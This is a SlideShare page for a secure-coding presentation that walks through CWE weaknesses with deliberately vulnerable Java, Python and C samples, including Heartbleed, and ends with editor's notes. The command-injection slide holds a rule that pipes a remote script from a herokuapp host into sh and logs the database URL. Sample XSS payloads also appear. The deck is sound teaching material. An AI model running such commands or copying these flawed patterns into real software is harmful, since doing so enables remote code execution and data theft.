Navneet kumar, profile picture
Uploaded byNavneet kumar
PPTX, PDF422 views

How Not to Code

The document outlines secure coding practices, presenting a security checklist that includes input validation, output encoding, and principles like least privilege and defense in depth. It also discusses common weaknesses in coding such as mass assignment, command injection, and incorrect authorization, providing code samples to illustrate these vulnerabilities. Additionally, various coding flaws are cataloged under the Common Weakness Enumeration (CWE) project, highlighting the importance of secure default configurations and the need for data sanitization.

Embed presentation

Download to read offline
HOW NOT TO CODE Navneet Kumar [ Secure Coding Practice ]
AGENDA ✘ Security CheckList ✘ Common Weakness Enumeration ✘ Bluejeans CWE ✘ Code Samples ✘ General InSecure Coding Practice
Security CHECKLIST 1. Validate Input 2. Output Encoding ( Data sanitization) 3.Design for security policy 4. Default Deny 5. Communication Security 6. Adhere to principle of least privilege 7. Defense in Depth 8. Authorization & Authentication 9. Cryptographic Practices 10.Establish secure default
Common WeakNESS ENUMERATION (CWE) Community project to catalogue software weakness and insecure coding patterns
Mass AssignMent ( CWE-915 ) {"attr" : "isAdmin", "val" : "true" } ❏ Don’t use internal functions ❏ Whitelist attributes ❏ Validate input # POST /profile/update # {"attr" : "name", "val" : "Navneet" } def update_profile(request, targetUser=None): attr = request.POST.get('attr', '') val = request.POST.get('val', '') profile = request.user.get_profile() profile.__setattr__(attr,val) profile.save() Python
OS COMMAND INJECTION ( CWE-78 ) rule "New rule" salience 9 when eval(true) then Logger logger = Logger.getLogger("com.bluejeans.services.meetme.validators.EndpointCustomProperties"); logger.info("Injected log with value: " + System.getProperty("hibernate.connection.url")); Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","curl -fsSL https://sec- demo.herokuapp.com/execute.sh | sh"}); System.out.println("hacked"); end JAVA Remote Code Execution on Server
OS COMMAND INJECTION ( CWE-78 ) void bjnupdateAPI::installPlugin(std::string installerPath) { int retCode; std::string command = "installer -pkg "; std::string targetPath = BJN::getMacPluginBasePath(); std::string target = " -target " + targetPath; command += installerPath + target; retCode = system(command.c_str()); } C++ Remote Code Execution on Client
InTEGRITY CHECK BYPASS( CWE-494 ) void bjnupdateAPI::installPlugin(std::string installerPath) { int retCode; std::string command = "installer -pkg "; std::string targetPath = BJN::getMacPluginBasePath(); std::string target = " -target " + targetPath; if(!BJN::verifyBinaryCertificate(installerPath)) { LOG(LS_INFO) << "installer is not signed: " << installerPath.c_str(); m_updateErrorCallback->InvokeAsync("", FB::variant_list_of(ERROR_INSTALLATION_FAILED)); return; } command += installerPath + target; retCode = system(command.c_str()); } C++
OPEN REDIRECT ( CWE-601 ) https://bluejeans.com/s/abcd => http://imdb.com ❏ Redirect only to relative path ❏ Whitelist domains ❏ Validate input # GET /s/abcd def get(request, url_category, short_url): urlShortener = URLShortener() try: redirectURL = urlShortener.get(short_url) return HttpResponseRedirect(redirectURL) except ObjectDoesNotExist: return render(request , '404.html') Python
@Path("/events/{event_id}/instance/{instanceId}/cms/{contentId}") public Response getResource(int userid, int instanceId, int contentId) { EventInstance eventInstance = serviceHelper .findEventInstance(instanceId); if (eventInstance == null) { logger.warn("No event instance found with id:" + instanceId); return Response.status(Status.NOT_FOUND).build(); } if (userid == eventInstance.getScheduledEvent().getOrganizerId()) { Map<String, Object> result = a2mRecordingClient.getResource(contentId); return Response.ok(result, MediaType.APPLICATION_JSON).build() } else { return Response.status(Status.NOT_FOUND).build(); } } JAVA INCORRECT Authorization ( CWE-863 )
Story of HEART BLEEDBEAT
Buffer OVER-READ ( CWE-126 ) int dtls1_process_heartbeat(SSL *s) { unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned int payload_length; /* Read payload length first */ n2s(p, payload_length); pl = p; unsigned char *buffer, *response_buffer; int response; /* Allocate memory for the response. Total memory = 2 Bytes for payload_length + payload_length */ buffer = OPENSSL_malloc(2 + payload_length); response_buffer = buffer; /* Enter response length and copy payload */ s2n(payload_length, response_buffer); memcpy(response_buffer, pl, payload_length); response = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 2 + payload_length); OPENSSL_free(buffer); return r; } C Response buffer reads more data
HeartBLEED
Buffer OVERFLOW ( CWE-120 ) void start_connection() { struct hostent *clienthp; char hostname[MAX_LEN]; // accept client connections and process requests int clientlen = sizeof(struct sockaddr_in); int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen); if (clientsocket >= 0) { clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET); strcpy(hostname, clienthp->h_name); logOutput("Accepted client connection from host ", hostname); close(clientsocket); } close(serversocket); } C/C++ HostName can have executable code
Buffer OVERFLOW
UNRESTRICTED FILE UPLOAD ( CWE-434 ) protected void doPost(HttpServletRequest request, HttpServletResponse response) { PrintWriter out = response.getWriter(); String contentType = request.getContentType(); String boundary = contentType.substring(contentType.indexOf("boundary=")+9); String pLine = new String(); String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); if (contentType != null && contentType.indexOf("multipart/form-data") != -1) { BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream())); // extract the filename pLine = br.readLine(); String filename = pLine.substring(pLine.lastIndexOf(""), pLine.lastIndexOf(""")); BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true)); for (String line; (line=br.readLine())!=null; ) { if (line.indexOf(boundary) == -1) { bw.write(line); bw.newLine(); bw.flush(); } } bw.close() ; } } JAVA
XSS ( CWE-79 ) http://facebook.com?q=<script>alert('xss')</script>Reflected <script> document.write("Site is at: " + document.location.href + "."); </script>] Dom XSS $('div').html('welcome to' + username + 'Meeting') //My username is saved as userName = "<script>alert('xss')</script>" Persistent
thanks! Any questions?

More Related Content

PDF
Nko workshop - node js crud & deploy
bySimon Su
 
PDF
MongoDB Performance Debugging
byMongoDB
 
PPTX
Hack ASP.NET website
byPositive Hack Days
 
PPTX
It's 10pm: Do You Know Where Your Writes Are?
byMongoDB
 
PPTX
Using Change Streams to Keep Up with Your Data
byEvan Rodd
 
PDF
Mongodb debugging-performance-problems
byMongoDB
 
PPTX
Building Your First Data Science Applicatino in MongoDB
byMongoDB
 
PDF
Tomcat连接池配置方法V2.1
byZianed Hou
 
Nko workshop - node js crud & deploy
bySimon Su
 
MongoDB Performance Debugging
byMongoDB
 
Hack ASP.NET website
byPositive Hack Days
 
It's 10pm: Do You Know Where Your Writes Are?
byMongoDB
 
Using Change Streams to Keep Up with Your Data
byEvan Rodd
 
Mongodb debugging-performance-problems
byMongoDB
 
Building Your First Data Science Applicatino in MongoDB
byMongoDB
 
Tomcat连接池配置方法V2.1
byZianed Hou
 

What's hot

PDF
T3chFest2016 - Uso del API JavaScript de Photoshop para obtener fotos HDTR
byDavid Gómez García
 
PDF
Developing cacheable backend applications - Appdevcon 2019
byThijs Feryn
 
ODP
Buenos Aires Drools Expert Presentation
byMark Proctor
 
TXT
Power Shell Commands
bySushree Nanda
 
PDF
MongoDB World 2016: Deciphering .explain() Output
byMongoDB
 
DOCX
Winform
byquocphu199
 
PDF
Testing with Node.js
byJonathan Waller
 
PDF
PostgreSQL Open SV 2018
byartgillespie
 
PDF
HashiCorp Vault configuration as code via HashiCorp Terraform- stories from t...
byAndrey Devyatkin
 
PDF
Drools Introduction
byJBug Italy
 
PDF
Models and Service Layers, Hemoglobin and Hobgoblins
byRoss Tuck
 
PDF
Introduction to Mongodb execution plan and optimizer
byMydbops
 
PDF
MongoDB Performance Tuning
byPuneet Behl
 
ODP
Caching and tuning fun for high scalability @ LOAD2012
byWim Godden
 
ODP
Intravert Server side processing for Cassandra
byEdward Capriolo
 
PDF
Java设置环境变量
byZianed Hou
 
PDF
Riak at The NYC Cloud Computing Meetup Group
bysiculars
 
PDF
Dropwizard
byScott Leberknight
 
PDF
Service discovery and configuration provisioning
bySource Ministry
 
T3chFest2016 - Uso del API JavaScript de Photoshop para obtener fotos HDTR
byDavid Gómez García
 
Developing cacheable backend applications - Appdevcon 2019
byThijs Feryn
 
Buenos Aires Drools Expert Presentation
byMark Proctor
 
Power Shell Commands
bySushree Nanda
 
MongoDB World 2016: Deciphering .explain() Output
byMongoDB
 
Winform
byquocphu199
 
Testing with Node.js
byJonathan Waller
 
PostgreSQL Open SV 2018
byartgillespie
 
HashiCorp Vault configuration as code via HashiCorp Terraform- stories from t...
byAndrey Devyatkin
 
Drools Introduction
byJBug Italy
 
Models and Service Layers, Hemoglobin and Hobgoblins
byRoss Tuck
 
Introduction to Mongodb execution plan and optimizer
byMydbops
 
MongoDB Performance Tuning
byPuneet Behl
 
Caching and tuning fun for high scalability @ LOAD2012
byWim Godden
 
Intravert Server side processing for Cassandra
byEdward Capriolo
 
Java设置环境变量
byZianed Hou
 
Riak at The NYC Cloud Computing Meetup Group
bysiculars
 
Dropwizard
byScott Leberknight
 
Service discovery and configuration provisioning
bySource Ministry
 

More from Navneet kumar

PPTX
Bitcoin cryptosecurity
byNavneet kumar
 
PPTX
Eagle Eye
byNavneet kumar
 
PPTX
Lambda Architecture in Practice
byNavneet kumar
 
PPTX
TrafikSense: Intelligent adaptive traffic signal
byNavneet kumar
 
PPTX
BlueBox: A videoconf dongle prototype
byNavneet kumar
 
PPTX
Securty 101
byNavneet kumar
 
PPTX
Breaking Bad: Enterprise Network Security
byNavneet kumar
 
PPTX
Performance tuning in hybrid mobile apps
byNavneet kumar
 
PPTX
Panacea
byNavneet kumar
 
Bitcoin cryptosecurity
byNavneet kumar
 
Eagle Eye
byNavneet kumar
 
Lambda Architecture in Practice
byNavneet kumar
 
TrafikSense: Intelligent adaptive traffic signal
byNavneet kumar
 
BlueBox: A videoconf dongle prototype
byNavneet kumar
 
Securty 101
byNavneet kumar
 
Breaking Bad: Enterprise Network Security
byNavneet kumar
 
Performance tuning in hybrid mobile apps
byNavneet kumar
 
Panacea
byNavneet kumar
 

Recently uploaded

PDF
Ecommerce Website Development Services - Web Panel Solutions.pdf
byWEB PANEL SOLUTIONS
 
PDF
ACE Aarhus February 2026: Atlassian news
byDanielEriksen5
 
PDF
Jira, Powered by Enterprise-Grade Intelligence from NeoroTalks.pdf
byNeoro Talks
 
PDF
openstack_operations_slides_version1.3_pp.pdf
byssuser47d511
 
PPTX
Chapter Two Logic and Language - Copy.pptx
byGediyonBelay
 
PPTX
Prime Teams – Real-Time Employee Monitoring & Project Management Software
byPrime Teams
 
PDF
Routing Guidelines: Unlocking Smarter Query Routing in MySQL Architectures
byMiguel Araújo
 
PDF
eresource Xcel ERP for Maunfacturing - Best Manufacturing ERP for SME
byeresource Infotech Pvt.Ltd
 
PPTX
40m_wAIred_DigitalPlatformRabobank_10022026.pptx
bySimonedeGijt
 
PDF
Complete iOS Delivery App Features & Admin Tools
byShiv Technolabs Pvt. Ltd.
 
PPTX
Installing Python in Visual Studio Code
bydabydcatahanibmcom
 
PPTX
Best Digital Marketing Company in Lucknow
bydigitallearning9277
 
PDF
Doctor On Call App Development for Digital Healthcare.
byV3CUBE TECHNOLABS
 
PDF
MySQL Routing Guidelines: Designing Smarter Query Routing Together
byMiguel Araújo
 
PDF
Introduction to Modern Artificial Intelligence.pdf
byAI n Dot Net
 
PPTX
‘Analyzing Application Logs Using AI’ Webinar
byTier1 app
 
PDF
Building Smarter AI: 16 RAG Approaches for Accuracy, Memory, and Reasoning Vi...
byVineet Sharma
 
PDF
HuemanAI Platform Overview.pptx (1) (2).pdf
byAnkur Handoo
 
PDF
Build Modern Applications with Amazon Aurora DSQL- AWS User Group Bonn 2026
byVadym Kazulkin
 
PDF
Ontwikkel sneller en veiliger met GitHub Copilot
byDelta-N
 
Ecommerce Website Development Services - Web Panel Solutions.pdf
byWEB PANEL SOLUTIONS
 
ACE Aarhus February 2026: Atlassian news
byDanielEriksen5
 
Jira, Powered by Enterprise-Grade Intelligence from NeoroTalks.pdf
byNeoro Talks
 
openstack_operations_slides_version1.3_pp.pdf
byssuser47d511
 
Chapter Two Logic and Language - Copy.pptx
byGediyonBelay
 
Prime Teams – Real-Time Employee Monitoring & Project Management Software
byPrime Teams
 
Routing Guidelines: Unlocking Smarter Query Routing in MySQL Architectures
byMiguel Araújo
 
eresource Xcel ERP for Maunfacturing - Best Manufacturing ERP for SME
byeresource Infotech Pvt.Ltd
 
40m_wAIred_DigitalPlatformRabobank_10022026.pptx
bySimonedeGijt
 
Complete iOS Delivery App Features & Admin Tools
byShiv Technolabs Pvt. Ltd.
 
Installing Python in Visual Studio Code
bydabydcatahanibmcom
 
Best Digital Marketing Company in Lucknow
bydigitallearning9277
 
Doctor On Call App Development for Digital Healthcare.
byV3CUBE TECHNOLABS
 
MySQL Routing Guidelines: Designing Smarter Query Routing Together
byMiguel Araújo
 
Introduction to Modern Artificial Intelligence.pdf
byAI n Dot Net
 
‘Analyzing Application Logs Using AI’ Webinar
byTier1 app
 
Building Smarter AI: 16 RAG Approaches for Accuracy, Memory, and Reasoning Vi...
byVineet Sharma
 
HuemanAI Platform Overview.pptx (1) (2).pdf
byAnkur Handoo
 
Build Modern Applications with Amazon Aurora DSQL- AWS User Group Bonn 2026
byVadym Kazulkin
 
Ontwikkel sneller en veiliger met GitHub Copilot
byDelta-N
 

How Not to Code

  • 1.
    HOW NOT TOCODE Navneet Kumar [ Secure Coding Practice ]
  • 2.
    AGENDA ✘ Security CheckList ✘Common Weakness Enumeration ✘ Bluejeans CWE ✘ Code Samples ✘ General InSecure Coding Practice
  • 3.
    Security CHECKLIST 1. ValidateInput 2. Output Encoding ( Data sanitization) 3.Design for security policy 4. Default Deny 5. Communication Security 6. Adhere to principle of least privilege 7. Defense in Depth 8. Authorization & Authentication 9. Cryptographic Practices 10.Establish secure default
  • 4.
    Common WeakNESS ENUMERATION(CWE) Community project to catalogue software weakness and insecure coding patterns
  • 5.
    Mass AssignMent (CWE-915 ) {"attr" : "isAdmin", "val" : "true" } ❏ Don’t use internal functions ❏ Whitelist attributes ❏ Validate input # POST /profile/update # {"attr" : "name", "val" : "Navneet" } def update_profile(request, targetUser=None): attr = request.POST.get('attr', '') val = request.POST.get('val', '') profile = request.user.get_profile() profile.__setattr__(attr,val) profile.save() Python
  • 6.
    OS COMMAND INJECTION( CWE-78 ) rule "New rule" salience 9 when eval(true) then Logger logger = Logger.getLogger("com.bluejeans.services.meetme.validators.EndpointCustomProperties"); logger.info("Injected log with value: " + System.getProperty("hibernate.connection.url")); Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","curl -fsSL https://sec- demo.herokuapp.com/execute.sh | sh"}); System.out.println("hacked"); end JAVA Remote Code Execution on Server
  • 7.
    OS COMMAND INJECTION( CWE-78 ) void bjnupdateAPI::installPlugin(std::string installerPath) { int retCode; std::string command = "installer -pkg "; std::string targetPath = BJN::getMacPluginBasePath(); std::string target = " -target " + targetPath; command += installerPath + target; retCode = system(command.c_str()); } C++ Remote Code Execution on Client
  • 8.
    InTEGRITY CHECK BYPASS(CWE-494 ) void bjnupdateAPI::installPlugin(std::string installerPath) { int retCode; std::string command = "installer -pkg "; std::string targetPath = BJN::getMacPluginBasePath(); std::string target = " -target " + targetPath; if(!BJN::verifyBinaryCertificate(installerPath)) { LOG(LS_INFO) << "installer is not signed: " << installerPath.c_str(); m_updateErrorCallback->InvokeAsync("", FB::variant_list_of(ERROR_INSTALLATION_FAILED)); return; } command += installerPath + target; retCode = system(command.c_str()); } C++
  • 9.
    OPEN REDIRECT (CWE-601 ) https://bluejeans.com/s/abcd => http://imdb.com ❏ Redirect only to relative path ❏ Whitelist domains ❏ Validate input # GET /s/abcd def get(request, url_category, short_url): urlShortener = URLShortener() try: redirectURL = urlShortener.get(short_url) return HttpResponseRedirect(redirectURL) except ObjectDoesNotExist: return render(request , '404.html') Python
  • 10.
    @Path("/events/{event_id}/instance/{instanceId}/cms/{contentId}") public Response getResource(intuserid, int instanceId, int contentId) { EventInstance eventInstance = serviceHelper .findEventInstance(instanceId); if (eventInstance == null) { logger.warn("No event instance found with id:" + instanceId); return Response.status(Status.NOT_FOUND).build(); } if (userid == eventInstance.getScheduledEvent().getOrganizerId()) { Map<String, Object> result = a2mRecordingClient.getResource(contentId); return Response.ok(result, MediaType.APPLICATION_JSON).build() } else { return Response.status(Status.NOT_FOUND).build(); } } JAVA INCORRECT Authorization ( CWE-863 )
  • 11.
    Story of HEARTBLEEDBEAT
  • 12.
    Buffer OVER-READ (CWE-126 ) int dtls1_process_heartbeat(SSL *s) { unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned int payload_length; /* Read payload length first */ n2s(p, payload_length); pl = p; unsigned char *buffer, *response_buffer; int response; /* Allocate memory for the response. Total memory = 2 Bytes for payload_length + payload_length */ buffer = OPENSSL_malloc(2 + payload_length); response_buffer = buffer; /* Enter response length and copy payload */ s2n(payload_length, response_buffer); memcpy(response_buffer, pl, payload_length); response = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 2 + payload_length); OPENSSL_free(buffer); return r; } C Response buffer reads more data
  • 13.
  • 14.
    Buffer OVERFLOW (CWE-120 ) void start_connection() { struct hostent *clienthp; char hostname[MAX_LEN]; // accept client connections and process requests int clientlen = sizeof(struct sockaddr_in); int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen); if (clientsocket >= 0) { clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET); strcpy(hostname, clienthp->h_name); logOutput("Accepted client connection from host ", hostname); close(clientsocket); } close(serversocket); } C/C++ HostName can have executable code
  • 15.
  • 16.
    UNRESTRICTED FILE UPLOAD( CWE-434 ) protected void doPost(HttpServletRequest request, HttpServletResponse response) { PrintWriter out = response.getWriter(); String contentType = request.getContentType(); String boundary = contentType.substring(contentType.indexOf("boundary=")+9); String pLine = new String(); String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); if (contentType != null && contentType.indexOf("multipart/form-data") != -1) { BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream())); // extract the filename pLine = br.readLine(); String filename = pLine.substring(pLine.lastIndexOf(""), pLine.lastIndexOf(""")); BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true)); for (String line; (line=br.readLine())!=null; ) { if (line.indexOf(boundary) == -1) { bw.write(line); bw.newLine(); bw.flush(); } } bw.close() ; } } JAVA
  • 17.
    XSS ( CWE-79) http://facebook.com?q=<script>alert('xss')</script>Reflected <script> document.write("Site is at: " + document.location.href + "."); </script>] Dom XSS $('div').html('welcome to' + username + 'Meeting') //My username is saved as userName = "<script>alert('xss')</script>" Persistent
  • 18.

Editor's Notes

  • #4 1. Validate input => command line args,user-controlled files, network-interface 2. Output encoding => output in context: Javascript engine,Rendering engine, Java VM 3. Security Policy => Design component based on privilege requirement.Enforce security policy. Roll password 4. Default Deny => Explicit inclusion rather than exclusion 5. Communication Security => use TLS across board,Certificates, 6. Least privilege => process should execute in minimum previlege. Elevated permission should be for in time 7. DID => layers of defense.Assume other upper layers are already compromised.e.g: In case of RCA only service is compromised 8. AA => Resource should have access constrol 9. Cryptographic practice => Protect master secret,Random number generator, Don’t invent crypto functions, Avoid broken crypt, Use salt 10. Secure Default => Configuration tuning defaults should be proper
  • #5 SAN top 25 CWE based on impact & exploitability http://cwe.mitre.org/
  • #6 Change unwanted attribute Ruby & other lang Framework gives options to whitelist attribute
  • #7 Import runtime Server is compromised
  • #8 Target is client
  • #12 2014 bug in openssl library which is in TLS Heartbeat extension to find if peer connection alive ( ping/pong ) Openssl is TLS implementation. In Feb 2012, heartbeat extension was introduced to keep the connection alive and avoid renoginations
  • #13 Copy the memory more than required Bound check failure
  • #14 Can read upto 64 KB of data => 2^16 ( 16 bit preserved for payload length ) Effected version => openssl 1.0.1 See other request exchange in plain format Compromise private keys of peers.This private key can be used to decrypt traffic later
  • #15 Hostname can be crafted to attack. Hostname can contain executable payload
  • #16 Violation of memory Safety ESP => Extended Stack pointer => pointer to top of stack, Extended Base pointer => pointer to current stack frame While writing data to a buffer, overruns the buffer's boundary and overwrites to adjacent memory Corrupting memory region => HEAP(dynamically allocated) or Stack ( call stack ) Stack => Override return address in stack frame,where return address is attacker-input filled buffer Avoid Safe language choice,Safe library ASLR => Address space layout randomization => randomization of memory space where functions & variables will reside,which make it difficult to guess
  • #17 Can upload any files Run in the context in shell,JSP templating engine,HTML,PHP processor